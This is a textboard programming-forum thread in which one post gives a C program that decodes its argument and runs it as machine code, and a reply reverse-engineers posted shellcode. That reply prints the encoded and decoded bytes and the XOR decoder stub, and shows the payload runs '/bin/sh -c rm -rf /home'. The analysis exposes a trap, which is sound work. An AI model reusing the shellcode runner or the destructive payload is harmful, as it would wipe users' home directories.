Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

/prog/ challenge

Name: Anonymous 2010-11-16 17:30

exploit

#include <stdio.h>
#include <string.h>

#define MAX 0xFF

int main(int argc, char **argv)
{
        if (argc != 2)
                return 1;
        else {
                char buf[MAX];
                int i;

                strncpy(buf, argv[1], MAX);

                for (i = 0; i < strlen(buf); ++i)
                        buf[i] = (buf[i] - (i % 0xF)) ^ i;

                ((void(*)())buf)();

                return 0;
        }
}

Name: not >>1-18 2010-11-17 7:38

>>16


That's invalid code, because you disaassembled it without decrypting it. I attempted decrypting it, but it just doesn't seem like valid code at all. Nevermind, I take that back, the junk actually is valid code:

Pre-decryption:
0012FE80  6A 0E 5D DD EE E1 78 2A 04 5B 95 83 2B 53 1B 98 
0012FE90  AC 94 FC F3 FB E7 3E 27 E0 45 0E 8A F0 99 36 96 
0012FEA0  52 F5 4A 58 E1 A5 0D 14 E7 06 1B AE 66 C4 8E 23 
0012FEB0  AA 8E 7E 48 D5 B6 59 50 D4 AE 6B 5E C4 EC 12 3F 
0012FEC0  84 AE 86 A8 26 87 00 00 00 00 00 00 00 00 00 00 
0012FED0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Post-decryption:
0012FE80  6A 0C 59 D9 EE D9 74 24 F4 5B 81 73 13 4B 03 97 
0012FE90  BB 83 EB FC E2 F4 21 08 CF 22 19 65 FF 96 28 8A 
0012FEA0  70 D3 64 70 FF BB 23 2C F5 D2 25 8A 74 E9 A3 0E 
0012FEB0  97 BB 4B 71 FA 9B 66 71 F1 9B 64 6B F8 D6 2E 03 
0012FEC0  C0 E8 C2 E2 5A 3B 00 00 00 00 00 00 00 00 00 00 
0012FED0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Disassembled:
0012FE80    6A 0C           PUSH 0C
0012FE82    59              POP ECX
0012FE83    D9EE            FLDZ
0012FE85    D97424 F4       FSTENV (28-BYTE) PTR SS:[ESP-C]
0012FE89    5B              POP EBX
0012FE8A    8173 13 4B0397B>XOR DWORD PTR DS:[EBX+13],BB97034B
0012FE91    83EB FC         SUB EBX,-4
0012FE94  ^ E2 F4           LOOPD SHORT 0012FE8A
0012FE96    2108            AND DWORD PTR DS:[EAX],ECX
0012FE98    CF              IRETD
0012FE99    2219            AND BL,BYTE PTR DS:[ECX]
0012FE9B    65:FF96 288A70D>CALL DWORD PTR GS:[ESI+D3708A28]
0012FEA2    64:70 FF        JO SHORT 0012FEA4                        ; Superfluous prefix
0012FEA5    BB 232CF5D2     MOV EBX,D2F52C23
0012FEAA    25 8A74E9A3     AND EAX,A3E9748A
0012FEAF    0E              PUSH CS
0012FEB0    97              XCHG EAX,EDI
0012FEB1    BB 4B71FA9B     MOV EBX,9BFA714B
0012FEB6  - 66:71 F1        JNO SHORT 0000FEAA
0012FEB9    9B              WAIT
0012FEBA    64:6BF8 D6      IMUL EDI,EAX,-2A                         ; Superfluous prefix
0012FEBE    2E:03C0         ADD EAX,EAX                              ; Superfluous prefix
0012FEC1    E8 C2E25A3B     CALL 3B6DE188
0012FEC6    0000            ADD BYTE PTR DS:[EAX],AL
0012FEC8    0000            ADD BYTE PTR DS:[EAX],AL
0012FECA    0000            ADD BYTE PTR DS:[EAX],AL
0012FECC    0000            ADD BYTE PTR DS:[EAX],AL
0012FECE    0000            ADD BYTE PTR DS:[EAX],AL
0012FED0    0000            ADD BYTE PTR DS:[EAX],AL
0012FED2    0000            ADD BYTE PTR DS:[EAX],AL
0012FED4    0000            ADD BYTE PTR DS:[EAX],AL
0012FED6    0000            ADD BYTE PTR DS:[EAX],AL
0012FED8    0000            ADD BYTE PTR DS:[EAX],AL
0012FEDA    0000            ADD BYTE PTR DS:[EAX],AL

Appears to be junk at first, but if you actually look at it closely, you'll see that it's valid code that's just encrypted:

0012FE8A    8173 13 4B0397B>XOR DWORD PTR DS:[EBX+13],BB97034B
0012FE91    83EB FC         SUB EBX,-4
0012FE94  ^ E2 F4           LOOPD SHORT 0012FE8A
^ decryption loop

After running the decryption stub:
0012FE96    6A 0B           PUSH 0B
0012FE98    58              POP EAX
0012FE99    99              CDQ
0012FE9A    52              PUSH EDX
0012FE9B    66:68 2D63      PUSH 632D
0012FE9F    89E7            MOV EDI,ESP
0012FEA1    68 2F736800     PUSH 68732F
0012FEA6    68 2F62696E     PUSH 6E69622F
0012FEAB    89E3            MOV EBX,ESP
0012FEAD    52              PUSH EDX
0012FEAE    E8 0D000000     CALL 0012FEC0
0012FEB3    72 6D           JB SHORT 0012FF22
0012FEB5    202D 7266202F   AND BYTE PTR DS:[2F206672],CH
0012FEBB    68 6F6D6500     PUSH 656D6F
0012FEC0    57              PUSH EDI
0012FEC1    53              PUSH EBX
0012FEC2    89E1            MOV ECX,ESP
0012FEC4    CD 80           INT 80

In the end, it just manually pushes the strings and their offsets into the stack, and sets eax to 0xB:
0012FE5E   0012FE6E  ASCII "/bin/sh"
0012FE62   0012FE76  ASCII "-c"
0012FE66   0012FEB3  RETURN to 0012FEB3 from 0012FEC0

@0012FEB3  72 6D 20 2D 72 66 20 2F 68 6F 6D 65 00 rm -rf /home

and then calls int80 (lunix syscall). eax=0xB indicates an "execve" syscall, thus it should basically just run:
/bin/sh -c rm -rf /home

How cute.

Too bad I ran this under a Windows debugger, and I only stepped through the code until the int 80 (which wouldn't work in Windows anyway), and even if I were to have debugged this under Linux, I wouldn't have stepped through that int 80 anyway.
Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -